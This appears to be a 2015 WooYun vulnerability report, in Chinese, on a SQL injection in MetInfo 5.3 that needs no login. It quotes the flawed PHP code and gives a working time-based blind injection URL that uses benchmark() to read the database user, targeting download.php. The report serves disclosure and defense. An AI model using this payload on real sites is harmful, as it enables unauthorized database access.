当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126295

漏洞标题:MetInfo最新版SQL注入一枚

相关厂商:MetInfo

漏洞作者: 牛肉包子

提交时间:2015-07-13 13:32

修复时间:2015-10-14 08:44

公开时间:2015-10-14 08:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-16: 厂商已经确认,细节仅向厂商公开
2015-07-19: 细节向第三方安全合作伙伴开放
2015-09-09: 细节向核心白帽子及相关领域专家公开
2015-09-19: 细节向普通白帽子公开
2015-09-29: 细节向实习白帽子公开
2015-10-14: 细节向公众公开

简要描述:

无需登录

详细说明:

看到
MetInfo5.3/include/global/listmod.php
164-184行

foreach($dbparaname as $key=>$val2){
$prices1="paraprice_".$val2['id'];
$prices=$$prices1;
var_dump($prices);
if($prices){
if(!strstr($prices, "-")){
preg_match('/([0-9\.]+)/',$prices,$result);
$results=$result[0];
$serch_sql .= " and exists(select * from $met_plist where module=3 and $met_plist.paraid='$val2[id]' and $met_plist.listid=$dbname.id and $met_plist.info > $results) ";
$serchpage .= "&".$prices1."=".trim($$prices1);
}else{
//echo 3;
$prices_sql=explode('-',$prices);
preg_match('/([0-9\.]+)/',$prices_sql[1],$result);
$results=$result[0];
$serch_sql .= " and exists(select * from $met_plist where module=3 and $met_plist.paraid='$val2[id]' and $met_plist.listid=$dbname.id and $met_plist.info > $prices_sql[0] and $met_plist.info < $results) ";
$serchpage .= "&".$prices1."=".trim($$prices1);
}

}
}


其中

$prices_sql[0]

没有初始化,也没有单引号包裹。造成sql注入,但是前面有个逻辑判断。
首先这里有个变量覆盖

$prices=$$prices1;

并且

paraprice_".$val2['id']

我们可以控制。
只有构造如下url就行了

http://127.0.0.1/MetInfo5.3/download/download.php?search=search&mdmendy=1&paraprice_14=tomato-xxxx&mdname=product


看到mysql日志

QQ截图20150712134427.png

漏洞证明:

然后构造exp

http://127.0.0.1/MetInfo5.3/download/download.php?search=search&mdmendy=1&paraprice_14=1) or if(ascii(mid(user(),1,1))=114,benchmark(10000000,md5(2)),1)%23-xxxx&mdname=product


QQ截图20150712134552.png


QQ截图20150712134720.png


注入成功

修复方案:

过滤

版权声明:转载请注明来源 牛肉包子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-07-16 08:43

厂商回复:

是系统漏洞,后续版本修复。

最新状态:

暂无